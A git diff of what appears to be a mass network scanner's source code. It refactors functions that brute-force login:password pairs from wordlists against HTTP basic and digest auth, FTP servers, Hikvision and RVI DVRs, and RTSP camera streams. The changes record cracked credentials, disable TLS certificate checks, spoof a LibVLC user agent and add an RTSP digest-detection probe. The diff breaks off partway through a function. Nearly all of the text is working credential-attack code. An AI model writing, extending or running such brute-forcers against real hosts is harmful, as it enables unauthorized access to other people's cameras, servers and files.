diff --git a/BasicAuth.cpp b/BasicAuth.cpp
index 7a38169..d44bfc2 100644
--- a/BasicAuth.cpp
+++ b/BasicAuth.cpp
@@ -90,6 +90,10 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck)
int sz = con.nConnect(ipOrig, port, &buff);
+ if (Utils::ustrstr(&buff, "404 not found") != -1 || Utils::ustrstr(&buff, "404 site") != -1) {
+ return lps;
+ }
+
char ip[256] = { 0 };
if (sz == 0) {
@@ -124,6 +128,11 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck)
}
int isDig = Utils::isDigest(&buff);
+ if (-2 == isDig) {
+ QString ipString = QString(ip);
+ stt->doEmitionFoundData("404 not found - " + ipString + "");
+ return lps;
+ }
if (isDig == -1) {
if (performDoubleCheck) {
Sleep(gTimeOut);
@@ -157,26 +166,31 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck)
return lps;
}
+ char login[32] = { 0 };
+ char pass[32] = { 0 };
for(int i = 0; i < MaxLogin; ++i) {
+ FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
+ strcpy(login, loginLst[i]);
for (int j = 0; j < MaxPass; ++j) {
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
if (!globalScanFlag) return lps;
- lpString = string(loginLst[i]) + ":" + string(passLst[j]);
+ strcpy(pass, passLst[j]);
+
+ lpString = string(login) + ":" + string(pass);
Connector con;
res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
- if (res == -2) return lps;
+ if (res == -2) {
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "TIMEOUT", rowIndex);
+
+ return lps;
+ }
else if (res != -1) {
res = checkOutput(&buffer, ip, port);
if (res == -2) {
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "404");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "404");
- }
+ rowIndex = Utils::addBARow(QString(ip), "--", "404", rowIndex);
strcpy(lps.other, "404");
return lps;
}
@@ -185,42 +199,21 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck)
break;
}
if (res == 1) {
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
- }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);
- strcpy(lps.login, loginLst[i]);
- strcpy(lps.pass, passLst[j]);
+ strcpy(lps.login, login);
+ strcpy(lps.pass, pass);
return lps;
};
}
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip),
- QString(loginLst[i]) + ":" + QString(passLst[j]),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- }
- else { rowIndex = -1; }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
++passCounter;
Sleep(50);
}
}
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
return lps;
}
diff --git a/Connector.cpp b/Connector.cpp
index 024c2f0..e3917a3 100644
--- a/Connector.cpp
+++ b/Connector.cpp
@@ -99,10 +99,10 @@ int my_trace(CURL *handle, curl_infotype type,
if (type == CURLINFO_HEADER_OUT) {
//data[size] = '\0';
//Activity += strlen(data);
+ data[size] = '\0';
QString qData = QString(data);
Activity += qData.length();
stt->doEmitionAddOutData(qData);
- data[0] = '\0';
}
//else if (type == CURLINFO_HEADER_IN) {
// QString qData = QString(data);
@@ -164,6 +164,7 @@ int pConnect(const char* ip, const int port, std::string *buffer,
"Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0");
curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L);
+ curl_easy_setopt(curl, CURLOPT_SSL_VERIFYSTATUS, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
@@ -208,7 +209,10 @@ int pConnect(const char* ip, const int port, std::string *buffer,
int sz = buffer->size();
curl_easy_cleanup(curl);
- if (res == CURLE_OK || (port == 21 && sz > 0)) {
+
+ if (res == 35) {
+ return -1;
+ } else if (res == CURLE_OK || sz > 0) {
return sz;
}
else if (res == CURLE_LOGIN_DENIED && port == 21) {
@@ -270,7 +274,7 @@ int pConnect(const char* ip, const int port, std::string *buffer,
return -1;
};
}
-int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString)
+int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString, bool isDigest)
{
buffer->clear();
int res = 0;
@@ -278,7 +282,7 @@ int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std:
if (curl != NULL)
{
- //curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
+ curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
if (MapWidgetOpened) {
struct data config;
config.trace_ascii = 1; /* enable ascii tracing */
@@ -287,124 +291,41 @@ int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std:
curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
}
- char newIP[128] = {0};
- strcpy(newIP, "rtsp://");
- strncat(newIP, ip, 96);
- strcat(newIP, "/ch1/main");
- /*int y = curl_easy_setopt(curl, CURLOPT_VERBOSE, 0L);
- y = curl_easy_setopt(curl, CURLOPT_NOPROGRESS, 1L);
- y = curl_easy_setopt(curl, CURLOPT_HEADERDATA, stdout);*/
- //curl_easy_setopt(curl, CURLOPT_URL, newIP);
- //curl_easy_setopt(curl, CURLOPT_PORT, port);
- curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, newIP);
- //y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS);
- //int y = curl_easy_setopt(curl, CURLOPT_URL, ip);
- //y = curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip);
- //curl_easy_setopt(curl, CURLOPT_PORT, port);
- /*y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS);
- res = curl_easy_perform(curl);
- y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE);*/
- res = curl_easy_perform(curl);
-
- //curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE);
- //curl_easy_setopt(curl, CURLOPT_USERAGENT,
- // "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0");
- //curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
- //curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L);
- //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
- //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
- //curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
- //curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
- //int proxyPort = std::atoi(gProxyPort);
- //if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
- //curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
- ////curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
- //curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
- //curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
-
- //if (lpString != NULL) {
- // curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L);
- // //curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L);
- // curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());
- // //curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
- // res = curl_easy_perform(curl);
- // /*if (digestMode)
- // {
- // curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
- // res = curl_easy_perform(curl);
-
- // if (port != 21 && lpString != NULL) {
- // int pos = Utils::ustrstr(*buffer, "\r\n\r\n");
- // if (pos != -1) {
- // *buffer = buffer->substr(pos + 4);
- // }
- // }
- // }
- // else res = curl_easy_perform(curl);*/
- //}
- //else res = curl_easy_perform(curl);
-
- int sz = buffer->size();
-
- curl_easy_cleanup(curl);
- if (res == CURLE_OK || (port == 21 && sz > 0)) {
- if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
- Activity += sz;
- return sz;
- }
- else if (res == CURLE_LOGIN_DENIED && port == 21) {
- return -1;
- }
- else if (res == CURLE_OPERATION_TIMEDOUT
- || res == CURLE_COULDNT_CONNECT
- || res == CURLE_SEND_ERROR
- || res == CURLE_RECV_ERROR
- ) {
- SOCKET eNobuffSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
- shutdown(eNobuffSocket, SD_BOTH);
- closesocket(eNobuffSocket);
- if (ENOBUFS == eNobuffSocket || ENOMEM == eNobuffSocket) {
- stt->doEmitionRedFoundData("Insufficient buffer/memory space. Sleeping for 10 sec...");
- Sleep(10000);
- }
- return -1;
+ curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, CURL_RTSPREQ_DESCRIBE);
+ curl_easy_setopt(curl, CURLOPT_USERAGENT,
+ "LibVLC/2.1.5 (LIVE555 Streaming Media v2014.05.27)");
+ curl_easy_setopt(curl, CURLOPT_URL, ip);
+ curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip);
+ curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
+ curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
+ curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
+ int proxyPort = std::atoi(gProxyPort);
+ if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
+ curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
+ curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
+ curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
+ if (isDigest) {
+ curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
}
else {
- if (res == 6) return -2;
- else if (res != 13 &&
- res != 67 &&
- res != 52 &&
- res != 56 &&
- res != 35 &&
- res != 19 &&
- res != 23)
- {
- if (res == 5) {
- stt->doEmitionRedFoundData("The given proxy host could not be resolved.");
- return -2;
- }
- else if (res == 8) {
- stt->doEmitionFoundData("Strange ftp reply. (" +
- QString::number(res) + ") " + QString(ip));
- return -2;
- }
- else if (res == 18) {
- return -2;
- }
- else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip));
- };
+ curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_BASIC);
+ }
+ curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());
+ res = curl_easy_perform(curl);
+
+ int sz = buffer->size();
+ curl_easy_cleanup(curl);
+
+ if (res == CURLE_OK || sz > 0) {
return sz;
}
-
- if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
-
- return sz;
- }
- else {
- stt->doEmitionRedFoundData("Curl error.");
+
return -1;
- };
+ }
+
+ stt->doEmitionRedFoundData("Curl error.");
+ return -1;
}
void eraser(std::string *buffer, const std::string delim1, const std::string delim2) {
@@ -430,14 +351,14 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
const std::vector *customHeaders,
const std::string *lpString,
bool digestMode,
- bool isRTSP){
+ bool isRTSP, bool isDigest){
int res = 0;
if (!isRTSP) {
res = pConnect(ip, port, buffer, postData, customHeaders, lpString, digestMode);
}
else {
- res = pConnectRTSP(ip, port, buffer, lpString);
+ res = pConnectRTSP(ip, port, buffer, lpString, isDigest);
}
cutoutComments(buffer);
@@ -447,6 +368,67 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
return res;
}
+int Connector::checkIsDigestRTSP(const char *ip, std::string *buffer) {
+
+ buffer->clear();
+ int res = 0;
+ CURL *curl = curl_easy_init();
+
+ if (curl != NULL)
+ {
+ curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
+ if (MapWidgetOpened) {
+ struct data config;
+ config.trace_ascii = 1; /* enable ascii tracing */
+ curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace);
+ curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config);
+ curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
+ }
+
+ curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, CURL_RTSPREQ_DESCRIBE);
+ curl_easy_setopt(curl, CURLOPT_USERAGENT,
+ "LibVLC/2.1.5 (LIVE555 Streaming Media v2014.05.27)");
+ curl_easy_setopt(curl, CURLOPT_URL, ip);
+ curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip);
+ curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
+ curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
+ curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
+ int proxyPort = std::atoi(gProxyPort);
+ if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
+ curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
+ curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
+ curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
+
+ res = curl_easy_perform(curl);
+
+ int sz = buffer->size();
+
+ curl_easy_cleanup(curl);
+ if (res == CURLE_OK || sz > 0) {
+ if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
+ Activity += sz;
+
+ if (Utils::ustrstr(buffer, "200 ok") != -1) {
+ return 2;
+ }
+ else if (Utils::ustrstr(buffer, "not found") != -1) {
+ return -1;
+ }
+ else if (Utils::ustrstr(buffer, "digest") != -1) {
+ return 1;
+ }
+ else {
+ return 0;
+ }
+ }
+
+ return -1;
+ }
+
+ stt->doEmitionRedFoundData("Curl error.");
+ return -1;
+}
+
bool portCheck(const char * sDVRIP, int wDVRPort) {
// sockaddr_in sa;
// sa.sin_family = AF_INET;
@@ -581,6 +563,9 @@ int Connector::connectToPort(char* ip, int port)
//strcpy(tempIp, "ftp://");
sprintf(tempIp, "ftp://%s:%d", ip, port);
}
+ /*else if (554 == port) {
+ sprintf(tempIp, "rtsp://%s:%d", ip, port);
+ }*/
else {
//strcpy(tempIp, "http://");
sprintf(tempIp, "http://%s:%d", ip, port);
diff --git a/Connector.h b/Connector.h
index d663440..299371f 100644
--- a/Connector.h
+++ b/Connector.h
@@ -8,7 +8,7 @@
#include
#include
#pragma comment(lib, "iphlpapi.lib")
-#pragma comment(lib,"curllib.lib")
+//#pragma comment(lib,"libcurldll.a")
#endif
#include
@@ -39,7 +39,8 @@ public:
const std::vector *customHeaders = NULL,
const std::string *lpString = NULL,
bool digestMode = false,
- bool isRTSP = false);
+ bool isRTSP = false, bool isDigest = true);
int connectToPort(char *ip, int port);
+ int checkIsDigestRTSP(const char *ip, std::string *buffer);
};
#endif // CONNECTOR_H
diff --git a/FTPAuth.cpp b/FTPAuth.cpp
index 969f4ea..777c0d0 100644
--- a/FTPAuth.cpp
+++ b/FTPAuth.cpp
@@ -19,9 +19,8 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
int passCounter = 0;
int rowIndex = -1;
- char login[128] = {0};
+ char login[32] = {0};
char pass[32] = {0};
- //char nip[128] = { 0 };
for (int i = 0; i < MaxFTPLogin; ++i)
{
@@ -37,18 +36,12 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
strcpy(pass, ftpPassLst[j]);
if (strlen(pass) <= 1) continue;
- lpString = string(login)
- + string(pass);
+ lpString = string(login) + string(pass);
Connector con;
res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString);
if (res == -2) {
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
return lps;
}
else if (res != -1) {
@@ -57,39 +50,18 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
strcpy(lps.pass, pass);
ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n');
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK");
- }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);
return lps;
};
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip),
- QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%");
- }
- }
- else { rowIndex = -1; }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%", rowIndex);
++passCounter;
Sleep(50);
}
}
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
return lps;
}
diff --git a/FileUpdater.cpp b/FileUpdater.cpp
index 47dbecf..4801b49 100644
--- a/FileUpdater.cpp
+++ b/FileUpdater.cpp
@@ -55,8 +55,7 @@ void updateLogin() {
while(fgets(buffFG, 32, loginList) != NULL)
{
MaxLogin++;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(loginList);
@@ -75,8 +74,7 @@ void updateLogin() {
if(strstr(buffFG, "\n") != NULL) strncat(loginLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(loginLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if(FileUpdater::oldLoginLstSize == 0) stt->doEmitionGreenFoundData("Login list loaded (" + QString::number(MaxLogin) + " entries)");
@@ -110,8 +108,7 @@ void updatePass() {
while(fgets(buffFG, 32, passList) != NULL)
{
MaxPass++;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(passList);
@@ -130,8 +127,7 @@ void updatePass() {
if(strstr(buffFG, "\n") != NULL) strncat(passLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(passLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if(FileUpdater::oldPassLstSize == 0) stt->doEmitionGreenFoundData("Password list loaded (" + QString::number(MaxPass) + " entries)");
@@ -157,7 +153,6 @@ void updateSSH() {
MaxSSHPass = 0;
char buffFG[32] = {0};
- //ZeroMemory(buffFG, sizeof(buffFG));
FILE *sshlpList = fopen(SSH_PASS_FN, "r");
@@ -166,7 +161,7 @@ void updateSSH() {
while(fgets(buffFG, 32, sshlpList) != NULL)
{
++MaxSSHPass;
- //ZeroMemory(buffFG, sizeof(buffFG));
+ ZeroMemory(buffFG, sizeof(buffFG));
buffFG[0] = 0;
};
@@ -186,8 +181,7 @@ void updateSSH() {
if(strstr(buffFG, "\n") != NULL) strncat(sshlpLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(sshlpLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if(FileUpdater::oldSSHLstSize == 0) stt->doEmitionGreenFoundData("SSH Password list loaded (" + QString::number(MaxSSHPass) + " entries)");
@@ -221,8 +215,7 @@ void updateWFLogin() {
while(fgets(buffFG, 32, wfLoginList) != NULL)
{
MaxWFLogin++;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(wfLoginList);
@@ -241,8 +234,7 @@ void updateWFLogin() {
if(strstr(buffFG, "\n") != NULL) strncat(wfLoginLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(wfLoginLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if(FileUpdater::oldWFLoginLstSize == 0) stt->doEmitionGreenFoundData("WFLogin list loaded (" + QString::number(MaxWFLogin) + " entries)");
@@ -271,8 +263,7 @@ void updateWFPass() {
while(fgets(buffFG, 32, wfPassList) != NULL)
{
MaxWFPass++;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(wfPassList);
@@ -291,8 +282,7 @@ void updateWFPass() {
if(strstr(buffFG, "\n") != NULL) strncat(wfPassLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(wfPassLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if(FileUpdater::oldWFPassLstSize == 0) stt->doEmitionGreenFoundData("WFPassword list loaded (" + QString::number(MaxWFPass) + " entries)");
@@ -321,8 +311,7 @@ void updateFTPLogin() {
while (fgets(buffFG, 32, ftpLoginList) != NULL)
{
MaxFTPLogin++;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(ftpLoginList);
@@ -341,8 +330,7 @@ void updateFTPLogin() {
if (strstr(buffFG, "\n") != NULL) strncat(ftpLoginLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(ftpLoginLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if (FileUpdater::oldFTPLoginLstSize == 0) stt->doEmitionGreenFoundData("FTP login list loaded (" + QString::number(MaxFTPLogin) + " entries)");
@@ -371,8 +359,7 @@ void updateFTPPass() {
while (fgets(buffFG, 32, ftpPassList) != NULL)
{
++MaxFTPPass;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(ftpPassList);
@@ -391,8 +378,7 @@ void updateFTPPass() {
if (strstr(buffFG, "\n") != NULL) strncat(ftpPassLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(ftpPassLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if (FileUpdater::oldFTPPassLstSize == 0) stt->doEmitionGreenFoundData("FTP password list loaded (" + QString::number(MaxFTPPass) + " entries)");
@@ -422,7 +408,7 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
void FileUpdater::updateLists() {
running = true;
while(globalScanFlag) {
- Sleep(600000);
+ Sleep(1000);
if(!globalScanFlag) break;
loadOnce();
}
diff --git a/HikvisionLogin.cpp b/HikvisionLogin.cpp
index 9f5e77c..35c8793 100644
--- a/HikvisionLogin.cpp
+++ b/HikvisionLogin.cpp
@@ -349,7 +349,7 @@ bool HikVis::checkSAFARI(const char * sDVRIP, int port) {
return false;
}
-
+#include "Utils.h"
lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort)
{
lopaStr lps = { "UNKNOWN", "", "" };
@@ -358,18 +358,15 @@ lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort)
strcpy(ip, sDVRIP);
int rowIndex = -1;
- char login[64] = { 0 };
- char pass[64] = { 0 };
+ char login[32] = { 0 };
+ char pass[32] = { 0 };
for (int i = 0; i < MaxLogin; ++i) {
+ FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
+ strcpy(login, loginLst[i]);
for (int j = 0; j < MaxPass; ++j) {
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
if (!globalScanFlag) return lps;
- /*ZeroMemory(login, 64);
- ZeroMemory(pass, 64);*/
- login[0] = 0;
- pass[0] = 0;
- strcpy(login, loginLst[i]);
strcpy(pass, passLst[j]);
NET_DVR_DEVICEINFO_V30 *info = 0;
@@ -380,39 +377,20 @@ lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort)
strcpy(lps.login, login);
strcpy(lps.pass, pass);
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK");
- }
-
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK", rowIndex);
+
return lps;
}
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort),
- QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- }
- else{ rowIndex = -1; }
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
+
++passCounter;
Sleep(200);
}
}
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL", rowIndex);
+
return lps;
}
@@ -467,6 +445,7 @@ int rvi_login_ptr(const char *sDVRIP, int wDVRPort, const char *login, const cha
return -1;
}
+#include "Utils.h"
lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort)
{
lopaStr lps = { "UNKNOWN", "", "" };
@@ -475,18 +454,15 @@ lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort)
strcpy(ip, sDVRIP);
int rowIndex = -1;
- char login[64] = { 0 };
- char pass[64] = { 0 };
+ char login[32] = { 0 };
+ char pass[32] = { 0 };
for (int i = 0; i < MaxLogin; ++i) {
+ FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
+ strcpy(login, loginLst[i]);
for (int j = 0; j < MaxPass; ++j) {
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
if (!globalScanFlag) return lps;
- /*ZeroMemory(login, 64);
- ZeroMemory(pass, 64);*/
- login[0] = 0;
- pass[0] = 0;
- strcpy(login, loginLst[i]);
strcpy(pass, passLst[j]);
if (strlen(login) > 8) break;
@@ -496,39 +472,20 @@ lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort)
strcpy(lps.login, login);
strcpy(lps.pass, pass);
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK");
- }
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK", rowIndex);
return lps;
}
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort),
- QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- }
- else { rowIndex = -1; }
